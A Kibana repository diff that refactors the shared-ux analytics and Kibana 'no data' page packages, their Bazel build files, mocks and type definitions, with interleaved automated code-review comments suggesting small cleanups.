-AnalyticsNoDataPage.argTypes = mock.getArgumentTypes(); - -export const LoadingState = (params: AnalyticsNoDataPageStorybookParams) => { - // Simulate loading with a Promise that doesn't resolve. - const dataCheck = () => new Promise((_reject, _resolve) => {}); - - const services = { - ...mock.getServices(params), - hasESData: dataCheck, - hasUserDataView: dataCheck, - hasDataView: dataCheck, - }; - - return ( - - - - ); -}; +Analytics.argTypes = mock.getArgumentTypes(); 
diff --git a/packages/shared-ux/page/analytics_no_data/mocks/BUILD.bazel b/packages/shared-ux/page/analytics_no_data/mocks/BUILD.bazel index 6d78e72892bfc..1600004860f88 100644 --- a/packages/shared-ux/page/analytics_no_data/mocks/BUILD.bazel +++ b/packages/shared-ux/page/analytics_no_data/mocks/BUILD.bazel @@ -10,8 +10,17 @@ SOURCE_FILES = glob( "src/**/*.ts", ], exclude = [ + "**/*.config.js", + "**/*.mock.*", "**/*.test.*", "**/*.stories.*", + "**/__snapshots__", + "**/integration_tests", + "**/mocks", + "**/scripts", + "**/storybook", + "**/test_fixtures", + "**/test_helpers", ], ) @@ -37,7 +46,9 @@ NPM_MODULE_EXTRA_FILES = [ # "@npm//name-of-package" # eg. "@npm//lodash" RUNTIME_DEPS = [ + "@npm//react", "//packages/shared-ux/page/kibana_no_data/mocks", + "//packages/shared-ux/storybook/mock", ] # In this array place dependencies necessary to build the types, which will include the @@ -50,10 +61,12 @@ RUNTIME_DEPS = [ # # References to NPM packages work the same as RUNTIME_DEPS TYPES_DEPS = [ - "@npm//@types/node", "@npm//@types/jest", + "@npm//@types/node", + "@npm//@types/react", "//packages/shared-ux/page/analytics_no_data/types:npm_module_types", "//packages/shared-ux/page/kibana_no_data/mocks:npm_module_types", + "//packages/shared-ux/storybook/mock:npm_module_types", ] jsts_transpiler( @@ -63,6 +76,14 @@ jsts_transpiler( root_input_dir = "src", ) +jsts_transpiler( + name = "target_web", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", + web = True, +) + ts_config( name = "tsconfig", src = "tsconfig.json", @@ -88,7 +109,7 @@ ts_project( js_library( name = PKG_DIRNAME, srcs = NPM_MODULE_EXTRA_FILES, - deps = RUNTIME_DEPS + [":target_node"], + deps = RUNTIME_DEPS + [":target_node", ":target_web"], package_name = PKG_REQUIRE_NAME, visibility = ["//visibility:public"], ) 
diff --git a/packages/shared-ux/page/analytics_no_data/mocks/jest.config.js b/packages/shared-ux/page/analytics_no_data/mocks/jest.config.js deleted file mode 100644 index ba5df95ec80fb..0000000000000 --- a/packages/shared-ux/page/analytics_no_data/mocks/jest.config.js +++ /dev/null @@ -1,13 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -module.exports = { - preset: '@kbn/test/jest_node', - rootDir: '../../../../..', - roots: ['/packages/shared-ux/page/analytics_no_data/mocks'], -}; diff --git a/packages/shared-ux/page/analytics_no_data/mocks/package.json b/packages/shared-ux/page/analytics_no_data/mocks/package.json index 30850ab7355ab..6fc9704e831f1 100644 --- a/packages/shared-ux/page/analytics_no_data/mocks/package.json +++ b/packages/shared-ux/page/analytics_no_data/mocks/package.json @@ -3,5 +3,6 @@ "private": true, "version": "1.0.0", "main": "./target_node/index.js", + "browser": "./target_web/index.js", "license": "SSPL-1.0 OR Elastic License 2.0" } \ No newline at end of file diff --git a/packages/shared-ux/page/analytics_no_data/mocks/tsconfig.json b/packages/shared-ux/page/analytics_no_data/mocks/tsconfig.json index 894f01d3220e9..dc96ec41f9035 100644 --- a/packages/shared-ux/page/analytics_no_data/mocks/tsconfig.json +++ b/packages/shared-ux/page/analytics_no_data/mocks/tsconfig.json @@ -9,10 +9,12 @@ "stripInternal": false, "types": [ "jest", - "node" + "node", + "react" ] }, "include": [ - "src/**/*" + "**/*.ts", + "**/*.tsx", ] } diff --git a/packages/shared-ux/page/kibana_no_data/impl/BUILD.bazel b/packages/shared-ux/page/kibana_no_data/impl/BUILD.bazel index 2fc986d65c1a4..7b1e16f9db829 100644 
--- a/packages/shared-ux/page/kibana_no_data/impl/BUILD.bazel +++ b/packages/shared-ux/page/kibana_no_data/impl/BUILD.bazel @@ -44,9 +44,8 @@ RUNTIME_DEPS = [ "@npm//@emotion/react", "@npm//react", "//packages/kbn-i18n", - "//packages/kbn-shared-ux-components", - "//packages/kbn-shared-ux-services", "//packages/shared-ux/prompt/no_data_views/impl", + "//packages/shared-ux/page/no_data_config/impl", ] # In this array place dependencies necessary to build the types, which will include the @@ -67,10 +66,10 @@ TYPES_DEPS = [ "@npm//@types/react", "//packages/kbn-ambient-ui-types", "//packages/kbn-i18n:npm_module_types", - "//packages/kbn-shared-ux-components:npm_module_types", - "//packages/kbn-shared-ux-services:npm_module_types", "//packages/shared-ux/prompt/no_data_views/impl:npm_module_types", - "//packages/shared-ux/page/kibana_no_data/types:npm_module_types", + "//packages/shared-ux/page/no_data_config/impl:npm_module_types", + "//packages/shared-ux/page/no_data_config/types", + "//packages/shared-ux/page/kibana_no_data/types", ] jsts_transpiler( diff --git a/packages/shared-ux/page/kibana_no_data/impl/README.mdx b/packages/shared-ux/page/kibana_no_data/impl/README.mdx index bc5dc37ac679a..f74adf2465e3b 100644 --- a/packages/shared-ux/page/kibana_no_data/impl/README.mdx +++ b/packages/shared-ux/page/kibana_no_data/impl/README.mdx @@ -14,7 +14,7 @@ The `KibanaNoDataPage` connected component uses: - `hasUserDataView` and `hasData` API from the `HasData` service in the `data_views` plugin to check for existence of data an data views. - `onDataViewCreated` callback once a data view has been created. -- (noDataConfig)[https://github.com/elastic/kibana/blob/main/packages/kbn-shared-ux-components/src/page_template/no_data_page/types.ts] as configuration for the page in case of no data. +- (noDataConfig)[https://github.com/elastic/kibana/blob/main/packages/shared-ux/page/no_data/types/index.d.ts] as configuration for the page in case of no data. ## API 
diff --git a/packages/shared-ux/page/kibana_no_data/impl/src/kibana_no_data_page.stories.tsx b/packages/shared-ux/page/kibana_no_data/impl/src/kibana_no_data_page.stories.tsx index f38b079dffec7..60cc78d95215c 100644 --- a/packages/shared-ux/page/kibana_no_data/impl/src/kibana_no_data_page.stories.tsx +++ b/packages/shared-ux/page/kibana_no_data/impl/src/kibana_no_data_page.stories.tsx @@ -17,7 +17,7 @@ import { KibanaNoDataPageProvider } from './services'; import mdx from '../README.mdx'; export default { - title: 'No Data/Kibana Page', + title: 'No Data/Page/Kibana', description: 'A component to display when there is no data available', parameters: { docs: { @@ -28,7 +28,7 @@ export default { const mock = new KibanaNoDataPageStorybookMock(); -export const KibanaNoDataPage = (params: KibanaNoDataPageStorybookParams) => { +export const Kibana = (params: KibanaNoDataPageStorybookParams) => { return ( @@ -36,7 +36,7 @@ export const KibanaNoDataPage = (params: KibanaNoDataPageStorybookParams) => { ); }; -KibanaNoDataPage.argTypes = mock.getArgumentTypes(); +Kibana.argTypes = mock.getArgumentTypes(); export const LoadingState = (params: KibanaNoDataPageStorybookParams) => { // Simulate loading with a Promise that doesn't resolve. diff --git a/packages/shared-ux/page/kibana_no_data/impl/src/kibana_no_data_page.test.tsx b/packages/shared-ux/page/kibana_no_data/impl/src/kibana_no_data_page.test.tsx index 7a0e0cd7e4f00..c15a5c061dd1b 100644 --- a/packages/shared-ux/page/kibana_no_data/impl/src/kibana_no_data_page.test.tsx +++ b/packages/shared-ux/page/kibana_no_data/impl/src/kibana_no_data_page.test.tsx 
@@ -12,7 +12,7 @@ import { act } from 'react-dom/test-utils'; import { EuiLoadingElastic } from '@elastic/eui'; import { mountWithIntl } from '@kbn/test-jest-helpers'; import { NoDataViewsPrompt } from '@kbn/shared-ux-prompt-no-data-views'; -import { NoDataConfigPage } from '@kbn/shared-ux-components'; +import { NoDataConfigPage } from '@kbn/shared-ux-page-no-data-config'; import { getKibanaNoDataPageServicesMock } from '@kbn/shared-ux-page-kibana-no-data-mocks'; import { KibanaNoDataPage } from './kibana_no_data_page'; @@ -43,7 +43,7 @@ describe('Kibana No Data Page', () => { }); test('renders NoDataConfigPage', async () => { - const services = getKibanaNoDataPageServicesMock({ config: { ...config, hasESData: false } }); + const services = getKibanaNoDataPageServicesMock(config); const component = mountWithIntl( @@ -58,7 +58,7 @@ describe('Kibana No Data Page', () => { }); test('renders NoDataViews', async () => { - const services = getKibanaNoDataPageServicesMock({ config: { ...config, hasESData: true } }); + const services = getKibanaNoDataPageServicesMock({ ...config, hasESData: true }); const component = mountWithIntl( diff --git a/packages/shared-ux/page/kibana_no_data/impl/src/kibana_no_data_page.tsx b/packages/shared-ux/page/kibana_no_data/impl/src/kibana_no_data_page.tsx index f2ac573232f34..73726d7b82eaa 100644 --- a/packages/shared-ux/page/kibana_no_data/impl/src/kibana_no_data_page.tsx +++ b/packages/shared-ux/page/kibana_no_data/impl/src/kibana_no_data_page.tsx @@ -7,7 +7,7 @@ */ import React, { useEffect, useState } from 'react'; import { EuiLoadingElastic } from '@elastic/eui'; -import { NoDataConfigPage } from '@kbn/shared-ux-components'; +import { NoDataConfigPage } from '@kbn/shared-ux-page-no-data-config'; import { NoDataViewsPrompt } from '@kbn/shared-ux-prompt-no-data-views'; import { KibanaNoDataPageProps } from '@kbn/shared-ux-page-kibana-no-data-types'; 
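Review bot: In the `renders NoDataConfigPage` test (hunk `@@ -43,7 +43,7 @@`) the services are now built from `config` unchanged, so the no-ES-data condition the assertion depends on is only implied by whatever the shared `config` defined above the hunk sets, while the sibling `renders NoDataViews` test in the following hunk still overrides `hasESData: true` explicitly. Making the first test symmetric, `const services = getKibanaNoDataPageServicesMock({ ...config, hasESData: false });`, keeps the precondition readable and protects the test from a later change to the `config` default. The `describe` block begins above the hunk.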
diff --git a/packages/shared-ux/page/kibana_no_data/impl/src/legacy_services.tsx b/packages/shared-ux/page/kibana_no_data/impl/src/legacy_services.tsx deleted file mode 100644 index 2a9580bb74684..0000000000000 --- a/packages/shared-ux/page/kibana_no_data/impl/src/legacy_services.tsx +++ /dev/null 
@@ -1,49 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -export { SharedUxServicesProvider as LegacyServicesProvider } from '@kbn/shared-ux-services'; -export type { SharedUxServices as LegacyServices } from '@kbn/shared-ux-services'; - -import { SharedUxServices as LegacyServices } from '@kbn/shared-ux-services'; -import type { KibanaNoDataPageServices } from '@kbn/shared-ux-page-kibana-no-data-types'; - -/** - * This list is temporary, a stop-gap as we migrate to a package-based architecture, where - * services are not collected in a single package. In order to make the transition, this - * interface is intentionally "flat". - * - * Expect this list to dwindle to zero as `@kbn/shared-ux-components` are migrated to their - * own packages, (and `@kbn/shared-ux-services` is removed). - */ -export const getLegacyServices = (services: KibanaNoDataPageServices): LegacyServices => ({ - application: { - currentAppId$: services.currentAppId$, - navigateToUrl: services.navigateToUrl, - }, - data: { - hasESData: services.hasESData, - hasDataView: services.hasDataView, - hasUserDataView: services.hasUserDataView, - }, - docLinks: { - dataViewsDocLink: services.dataViewsDocLink, - }, - editors: { - openDataViewEditor: services.openDataViewEditor, - }, - http: { - addBasePath: services.addBasePath, - }, - permissions: { - canAccessFleet: services.canAccessFleet, - canCreateNewDataView: services.canCreateNewDataView, - }, - platform: { - setIsFullscreen: services.setIsFullscreen, - }, -}); 
diff --git a/packages/shared-ux/page/kibana_no_data/impl/src/services.tsx b/packages/shared-ux/page/kibana_no_data/impl/src/services.tsx index 0aab90ce9f504..3ebab02d63790 100644 --- a/packages/shared-ux/page/kibana_no_data/impl/src/services.tsx +++ b/packages/shared-ux/page/kibana_no_data/impl/src/services.tsx @@ -15,13 +15,12 @@ import { import { NoDataCardProvider, NoDataCardKibanaProvider } from '@kbn/shared-ux-card-no-data'; import { + Services, KibanaNoDataPageServices, KibanaNoDataPageKibanaDependencies, } from '@kbn/shared-ux-page-kibana-no-data-types'; -import { LegacyServicesProvider, getLegacyServices } from './legacy_services'; - -const KibanaNoDataPageContext = React.createContext(null); +const KibanaNoDataPageContext = React.createContext(null); /** * A Context Provider that provides services to the component. @@ -29,15 +28,17 @@ const KibanaNoDataPageContext = React.createContext = ({ children, ...services -}) => ( - - - - {children} - - - -); +}) => { + const { hasESData, hasUserDataView } = services; + + return ( + + + {children} + + + ); +}; /** * Kibana-specific Provider that maps dependencies to services. 
@@ -46,27 +47,16 @@ export const KibanaNoDataPageKibanaProvider: FC { - const { coreStart, dataViewEditor, dataViews } = dependencies; - const value: KibanaNoDataPageServices = { - addBasePath: coreStart.http.basePath.prepend, - canAccessFleet: coreStart.application.capabilities.navLinks.integrations, - canCreateNewDataView: dataViewEditor.userPermissions.editDataView(), - currentAppId$: coreStart.application.currentAppId$, - dataViewsDocLink: coreStart.docLinks.links.indexPatterns?.introduction, - hasDataView: dataViews.hasData.hasDataView, + const { dataViews } = dependencies; + const value: Services = { hasESData: dataViews.hasData.hasESData, hasUserDataView: dataViews.hasData.hasUserDataView, - navigateToUrl: coreStart.application.navigateToUrl, - openDataViewEditor: dataViewEditor.openEditor, - setIsFullscreen: (isVisible: boolean) => coreStart.chrome.setIsVisible(isVisible), }; return ( - - {children} - + {children} ); diff --git a/packages/shared-ux/page/kibana_no_data/mocks/BUILD.bazel b/packages/shared-ux/page/kibana_no_data/mocks/BUILD.bazel index 2c195edb6de03..7f8c4c03fc92d 100644 --- a/packages/shared-ux/page/kibana_no_data/mocks/BUILD.bazel +++ b/packages/shared-ux/page/kibana_no_data/mocks/BUILD.bazel @@ -10,8 +10,17 @@ SOURCE_FILES = glob( "src/**/*.ts", ], exclude = [ + "**/*.config.js", + "**/*.mock.*", "**/*.test.*", "**/*.stories.*", + "**/__snapshots__", + "**/integration_tests", + "**/mocks", + "**/scripts", + "**/storybook", + "**/test_fixtures", + "**/test_helpers", ], ) @@ -37,8 +46,10 @@ NPM_MODULE_EXTRA_FILES = [ # "@npm//name-of-package" # eg. "@npm//lodash" RUNTIME_DEPS = [ - "//packages/shared-ux/prompt/no_data_views/mocks", + "@npm//react", "//packages/shared-ux/card/no_data/mocks", + "//packages/shared-ux/prompt/no_data_views/mocks", + "//packages/shared-ux/storybook/mock", ] # In this array place dependencies necessary to build the types, which will include the 
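Review bot: `value` is a fresh object on every render of `KibanaNoDataPageKibanaProvider`, so every consumer of the context re-renders whenever this provider does, even though both fields are read from the same `dataViews.hasData` object. If `useMemo` is available from the file's react import, `const value: Services = useMemo(() => ({ hasESData: dataViews.hasData.hasESData, hasUserDataView: dataViews.hasData.hasUserDataView }), [dataViews.hasData]);` avoids that. The mappings this hunk drops (`addBasePath`, `canAccessFleet`, `openDataViewEditor`, `setIsFullscreen`, …) are presumably now performed by the nested Kibana providers rendered below; a one-line comment such as `// the remaining dependencies are mapped by the nested *KibanaProvider components` would tell the next reader where they went. The component's signature is above the hunk and its JSX is not visible here.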
@@ -51,12 +62,14 @@ RUNTIME_DEPS = [ # # References to NPM packages work the same as RUNTIME_DEPS TYPES_DEPS = [ - "@npm//@types/node", "@npm//@types/jest", + "@npm//@types/node", + "@npm//@types/react", + "//packages/shared-ux/card/no_data/mocks:npm_module_types", "//packages/shared-ux/page/kibana_no_data/types:npm_module_types", - "//packages/kbn-shared-ux-components:npm_module_types", + "//packages/shared-ux/page/no_data/types", "//packages/shared-ux/prompt/no_data_views/mocks:npm_module_types", - "//packages/shared-ux/card/no_data/mocks:npm_module_types", + "//packages/shared-ux/storybook/mock:npm_module_types", ] jsts_transpiler( @@ -66,6 +79,14 @@ jsts_transpiler( root_input_dir = "src", ) +jsts_transpiler( + name = "target_web", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", + web = True, +) + ts_config( name = "tsconfig", src = "tsconfig.json", @@ -91,7 +112,7 @@ ts_project( js_library( name = PKG_DIRNAME, srcs = NPM_MODULE_EXTRA_FILES, - deps = RUNTIME_DEPS + [":target_node"], + deps = RUNTIME_DEPS + [":target_node", ":target_web"], package_name = PKG_REQUIRE_NAME, visibility = ["//visibility:public"], ) diff --git a/packages/shared-ux/page/kibana_no_data/mocks/jest.config.js b/packages/shared-ux/page/kibana_no_data/mocks/jest.config.js deleted file mode 100644 index 4c71cbdc32e91..0000000000000 --- a/packages/shared-ux/page/kibana_no_data/mocks/jest.config.js +++ /dev/null @@ -1,13 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -module.exports = { - preset: '@kbn/test/jest_node', - rootDir: '../../../../..', - roots: ['/packages/shared-ux/page/kibana_no_data/mocks'], -}; 
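Review bot: In TYPES_DEPS the new entry `"//packages/shared-ux/page/no_data/types"` is the only package reference written without a `:npm_module_types` suffix, while its sibling `"//packages/shared-ux/page/kibana_no_data/types:npm_module_types"` keeps it. If the `no_data/types` package defines that target, the entry should read `"//packages/shared-ux/page/no_data/types:npm_module_types",` for consistency; if types-only packages deliberately expose just the default target, a one-line comment in the list saying so would stop the next reader from "fixing" it. The same bare form appears in the new kibana_template impl and mocks BUILD files later in this diff.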
diff --git a/packages/shared-ux/page/kibana_no_data/mocks/package.json b/packages/shared-ux/page/kibana_no_data/mocks/package.json
index 988bdc1d33aca..f134da02e430f 100644
--- a/packages/shared-ux/page/kibana_no_data/mocks/package.json
+++ b/packages/shared-ux/page/kibana_no_data/mocks/package.json
@@ -3,5 +3,6 @@
 "private": true,
 "version": "1.0.0",
 "main": "./target_node/index.js",
+ "browser": "./target_web/index.js",
 "license": "SSPL-1.0 OR Elastic License 2.0"
-}
+}
\ No newline at end of file
diff --git a/packages/shared-ux/page/kibana_no_data/mocks/src/jest.ts b/packages/shared-ux/page/kibana_no_data/mocks/src/jest.ts
index 33f26bafbd33d..5f2f6b309e56c 100644
--- a/packages/shared-ux/page/kibana_no_data/mocks/src/jest.ts
+++ b/packages/shared-ux/page/kibana_no_data/mocks/src/jest.ts
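Review bot: The `-} +} \ No newline at end of file` pair shows this change strips the trailing newline from package.json, which is the only edit besides the added `browser` field and will surface as noise in every later diff of the file. Keep the final newline; the new package.json files for kibana_template/impl and kibana_template/mocks further down are written without one as well.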
@@ -9,33 +9,34 @@ import { getNoDataCardServicesMock } from '@kbn/shared-ux-card-no-data-mocks'; import { KibanaNoDataPageServices } from '@kbn/shared-ux-page-kibana-no-data-types'; import { getNoDataViewsPromptServicesMock } from '@kbn/shared-ux-prompt-no-data-views-mocks'; -import { mockServicesFactory, MockServicesFactoryParams } from '@kbn/shared-ux-services'; + +interface Params { + hasESData: boolean; + hasUserDataView: boolean; +} + +const defaultParams = { + hasESData: true, + hasUserDataView: true, +}; /** * Returns the Jest-compatible service abstractions for the `KibanaNoDataPage` Provider. */ -export const getServicesMock = (params?: MockServicesFactoryParams) => { - const { canCreateNewDataView, dataViewsDocLink, openDataViewEditor } = - getNoDataViewsPromptServicesMock(); - - const { addBasePath, canAccessFleet } = getNoDataCardServicesMock(); +export const getServicesMock = (params?: Partial) => { + const hasESData = + params && params.hasESData !== undefined ? params.hasESData : defaultParams.hasESData; - const { application, data, docLinks, editors, http, permissions, platform } = - mockServicesFactory(params); + const hasUserDataView = + params && params.hasUserDataView !== undefined + ? params.hasUserDataView + : defaultParams.hasUserDataView; const services: KibanaNoDataPageServices = { - ...application, - ...data, - ...docLinks, - ...editors, - ...http, - ...permissions, - ...platform, - canCreateNewDataView, - dataViewsDocLink, - openDataViewEditor, - addBasePath, - canAccessFleet, + ...getNoDataCardServicesMock(), + ...getNoDataViewsPromptServicesMock(), + hasESData: async () => hasESData, + hasUserDataView: async () => hasUserDataView, }; return services; diff --git a/packages/shared-ux/page/kibana_no_data/mocks/src/storybook.ts b/packages/shared-ux/page/kibana_no_data/mocks/src/storybook.ts index 32dcdfe486580..1f4a7453e59b6 100644 --- a/packages/shared-ux/page/kibana_no_data/mocks/src/storybook.ts 
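Review bot: The two ternaries in `getServicesMock` re-implement nullish defaulting by hand; `const hasESData = params?.hasESData ?? defaultParams.hasESData;` and `const hasUserDataView = params?.hasUserDataView ?? defaultParams.hasUserDataView;` are equivalent (an explicit `undefined` still falls back to the default) and read in one line each. `defaultParams` is also untyped, so a key drifting out of sync with `Params` would not be caught; declare it `const defaultParams: Params = { ... }`. The generic argument of `Partial` is not visible in this rendering; presumably it is `Params`.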
+++ b/packages/shared-ux/page/kibana_no_data/mocks/src/storybook.ts @@ -6,13 +6,14 @@ * Side Public License, v 1. */ -import { servicesFactory } from '@kbn/shared-ux-storybook'; +import { action } from '@storybook/addon-actions'; + import { AbstractStorybookMock, ArgumentParams } from '@kbn/shared-ux-storybook-mock'; import type { KibanaNoDataPageServices, KibanaNoDataPageProps, } from '@kbn/shared-ux-page-kibana-no-data-types'; -import type { NoDataPageProps } from '@kbn/shared-ux-components'; +import type { NoDataPageProps } from '@kbn/shared-ux-page-no-data-types'; import { NoDataViewsPromptStorybookMock, @@ -23,7 +24,6 @@ import { NoDataCardStorybookMock, NoDataCardStorybookParams, } from '@kbn/shared-ux-card-no-data-mocks'; -import { action } from '@storybook/addon-actions'; type PropArguments = Pick; type ServiceArguments = Pick; @@ -83,22 +83,11 @@ export class StorybookMock extends AbstractStorybookMock< } getServices(params: Params): KibanaNoDataPageServices { - // Workaround to leverage the services package. - const { application, data, docLinks, editors, http, permissions, platform } = - servicesFactory(params); - return { - ...application, - ...data, - ...docLinks, - ...editors, - ...http, - ...permissions, - ...platform, - hasESData: () => params.hasESData, - hasUserDataView: () => params.hasUserDataView, ...noDataCardMock.getServices(params), ...noDataViewsMock.getServices(params), + hasESData: () => params.hasESData, + hasUserDataView: () => params.hasUserDataView, }; } } diff --git a/packages/shared-ux/page/kibana_no_data/mocks/tsconfig.json b/packages/shared-ux/page/kibana_no_data/mocks/tsconfig.json index 894f01d3220e9..dc96ec41f9035 100644 --- a/packages/shared-ux/page/kibana_no_data/mocks/tsconfig.json +++ b/packages/shared-ux/page/kibana_no_data/mocks/tsconfig.json @@ -9,10 +9,12 @@ "stripInternal": false, "types": [ "jest", - "node" + "node", + "react" ] }, "include": [ - "src/**/*" + "**/*.ts", + "**/*.tsx", ] } 
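Review bot: `hasESData: () => params.hasESData` and `hasUserDataView: () => params.hasUserDataView` in `getServices` return the raw parameter, whereas the Jest mock in this same diff returns them as promises (`async () => hasESData`) and the `Services` interface in types/index.d.ts declares both as functions returning a Promise. If `params.hasESData` is a plain boolean this only type-checks when the `Params` mapping already widens it; otherwise `hasESData: async () => params.hasESData,` keeps the two mocks consistent and spares callers that `await` the result. The enclosing `StorybookMock` class starts outside the hunk.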
diff --git a/packages/shared-ux/page/kibana_no_data/types/index.d.ts b/packages/shared-ux/page/kibana_no_data/types/index.d.ts index cfa1da12ccedf..18fe5499e93c3 100644 --- a/packages/shared-ux/page/kibana_no_data/types/index.d.ts +++ b/packages/shared-ux/page/kibana_no_data/types/index.d.ts 
@@ -6,109 +6,44 @@ * Side Public License, v 1. */ -import { Observable } from 'rxjs'; -import { NoDataPageProps } from '@kbn/shared-ux-components'; +import { NoDataPageProps } from '@kbn/shared-ux-page-no-data-types'; -/** - * TODO: `DataView` is a class exported by `src/plugins/data_views/public`. Since this service - * is contained in this package-- and packages can only depend on other packages and never on - * plugins-- we have to set this to `unknown`. If and when `DataView` is exported from a - * stateless package, we can remove this. - * - * @see: https://github.com/elastic/kibana/issues/127695 - */ -type DataView = unknown; - -/** - * A subset of the `DataViewEditorOptions` interface relevant to this component. - * - * @see: src/plugins/data_view_editor/public/types.ts - */ -interface DataViewEditorOptions { - /** Handler to be invoked when the Data View Editor completes a save operation. */ - onSave: (dataView: DataView) => void; -} +import { + NoDataViewsPromptServices, + NoDataViewsPromptKibanaDependencies, +} from '@kbn/shared-ux-prompt-no-data-views-types'; +import { + NoDataCardServices, + NoDataCardKibanaDependencies, +} from '@kbn/shared-ux-card-no-data-types'; -/** - * A list of Services that are consumed by this component. - * - * This list is temporary, a stopgap as we migrate to a package-based architecture, where - * services are not collected in a single package. In order to make the transition, this - * interface is intentionally "flat". - * - * Expect this list to dwindle to zero as `@kbn/shared-ux-components` are migrated to their - * own packages, (and `@kbn/shared-ux-services` is removed). - */ -export interface KibanaNoDataPageServices { +export interface Services { /** True if the cluster contains data, false otherwise. */ hasESData: () => Promise; /** True if Kibana instance contains user-created data view, false otherwise. */ hasUserDataView: () => Promise; - - // Provided to Legacy Services, not relevant to this component. 
Will be removed. - /** Append the server base path to a relative URL. */ - addBasePath: (url: string) => string; - /** True if the user has permission to access Fleet, false otherwise. */ - canAccessFleet: boolean; - /** True if the user has permission to create a new Data View, false otherwise. */ - canCreateNewDataView: boolean; - /** Observable storing the active, current application ID. */ - currentAppId$: Observable; - /** A link to information about Data Views in Kibana */ - dataViewsDocLink: string; - /** True if Kibana instance contains any data view, including system-created ones. */ - hasDataView: () => Promise; - /** Use Kibana to navigate async to a different URL. */ - navigateToUrl: (url: string) => Promise | void; - /** A method to open the Data View Editor flow. */ - openDataViewEditor: (options: DataViewEditorOptions) => () => void; - /** Set the Kibana chrome and browser to full screen mode. */ - setIsFullscreen: (isFullscreen: boolean) => void; } /** - * An interface containing a collection of Kibana plugins and services required to - * render this component and its dependencies. + * A list of Services that are consumed by this component.. 
*/ -export interface KibanaNoDataPageKibanaDependencies { - coreStart: { - application: { - capabilities: { - navLinks: Record; - }; - currentAppId$: Observable; - navigateToUrl: (url: string) => Promise; - }; - chrome: { - setIsVisible: (isVisible: boolean) => void; - }; - docLinks: { - links: { - indexPatterns: { - introduction: string; - }; - }; - }; - http: { - basePath: { - prepend: (url: string) => string; - }; - }; - }; +export type KibanaNoDataPageServices = Services & NoDataCardServices & NoDataViewsPromptServices; + +export interface KibanaDependencies { dataViews: { hasData: { - hasDataView: () => Promise; hasESData: () => Promise; hasUserDataView: () => Promise; }; }; - dataViewEditor: { - openEditor: (options: DataViewEditorOptions) => () => void; - userPermissions: { - editDataView: () => boolean; - }; - }; } +/** + * An interface containing a collection of Kibana plugins and services required to + * render this component and its dependencies. + */ +export type KibanaNoDataPageKibanaDependencies = KibanaDependencies & + NoDataViewsPromptKibanaDependencies & + NoDataCardKibanaDependencies; /** * Props for `KibanaNoDataPage`. diff --git a/packages/shared-ux/page/kibana_template/impl/BUILD.bazel b/packages/shared-ux/page/kibana_template/impl/BUILD.bazel new file mode 100644 index 0000000000000..8e27df56eadf2 --- /dev/null +++ b/packages/shared-ux/page/kibana_template/impl/BUILD.bazel 
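Review bot: The doc comment on the new `KibanaNoDataPageServices` alias ends with a doubled period (`consumed by this component..`), and the two new interfaces `Services` and `KibanaDependencies` carry no TSDoc at all, even though the old `KibanaNoDataPageServices` block they replace explained how the services were arranged. Suggest a line such as `/** Services owned by this page; card and prompt services are merged in via KibanaNoDataPageServices. */` above `Services`, a matching one-liner above `KibanaDependencies` naming the `dataViews` plugin contract it models, and the alias comment corrected to end with a single period.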
@@ -0,0 +1,137 @@ +load("@npm//@bazel/typescript:index.bzl", "ts_config") +load("@build_bazel_rules_nodejs//:index.bzl", "js_library") +load("//src/dev/bazel:index.bzl", "jsts_transpiler", "pkg_npm", "pkg_npm_types", "ts_project") + +PKG_DIRNAME = "impl" +PKG_REQUIRE_NAME = "@kbn/shared-ux-page-kibana-template" + +SOURCE_FILES = glob( + [ + "src/**/*.ts", + "src/**/*.tsx", + "src/**/*.mdx", + ], + exclude = [ + "**/*.test.*", + "**/*.stories.*", + ], +) + +SRCS = SOURCE_FILES + +filegroup( + name = "srcs", + srcs = SRCS, +) + +NPM_MODULE_EXTRA_FILES = [ + "package.json", +] + +# In this array place runtime dependencies, including other packages and NPM packages +# which must be available for this code to run. +# +# To reference other packages use: +# "//repo/relative/path/to/package" +# eg. "//packages/kbn-utils" +# +# To reference a NPM package use: +# "@npm//name-of-package" +# eg. "@npm//lodash" +RUNTIME_DEPS = [ + "@npm//react", + "//packages/shared-ux/page/no_data_config/impl", +] + +# In this array place dependencies necessary to build the types, which will include the +# :npm_module_types target of other packages and packages from NPM, including @types/* +# packages. +# +# To reference the types for another package use: +# "//repo/relative/path/to/package:npm_module_types" +# eg. 
"//packages/kbn-utils:npm_module_types" +# +# References to NPM packages work the same as RUNTIME_DEPS +TYPES_DEPS = [ + "@npm//@types/node", + "@npm//@types/jest", + "@npm//@types/react", + "//packages/shared-ux/page/no_data_config/impl:npm_module_types", + "//packages/shared-ux/page/kibana_template/types", + "//packages/kbn-ambient-ui-types", +] + +jsts_transpiler( + name = "target_node", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", +) + +jsts_transpiler( + name = "target_web", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", + web = True, + additional_args = [ + "--copy-files", + "--quiet" + ], +) + +ts_config( + name = "tsconfig", + src = "tsconfig.json", + deps = [ + "//:tsconfig.base.json", + "//:tsconfig.bazel.json", + ], +) + +ts_project( + name = "tsc_types", + args = ['--pretty'], + srcs = SRCS, + deps = TYPES_DEPS, + declaration = True, + declaration_map = True, + emit_declaration_only = True, + out_dir = "target_types", + root_dir = "src", + tsconfig = ":tsconfig", +) + +js_library( + name = PKG_DIRNAME, + srcs = NPM_MODULE_EXTRA_FILES, + deps = RUNTIME_DEPS + [":target_node", ":target_web"], + package_name = PKG_REQUIRE_NAME, + visibility = ["//visibility:public"], +) + +pkg_npm( + name = "npm_module", + deps = [":" + PKG_DIRNAME], +) + +filegroup( + name = "build", + srcs = [":npm_module"], + visibility = ["//visibility:public"], 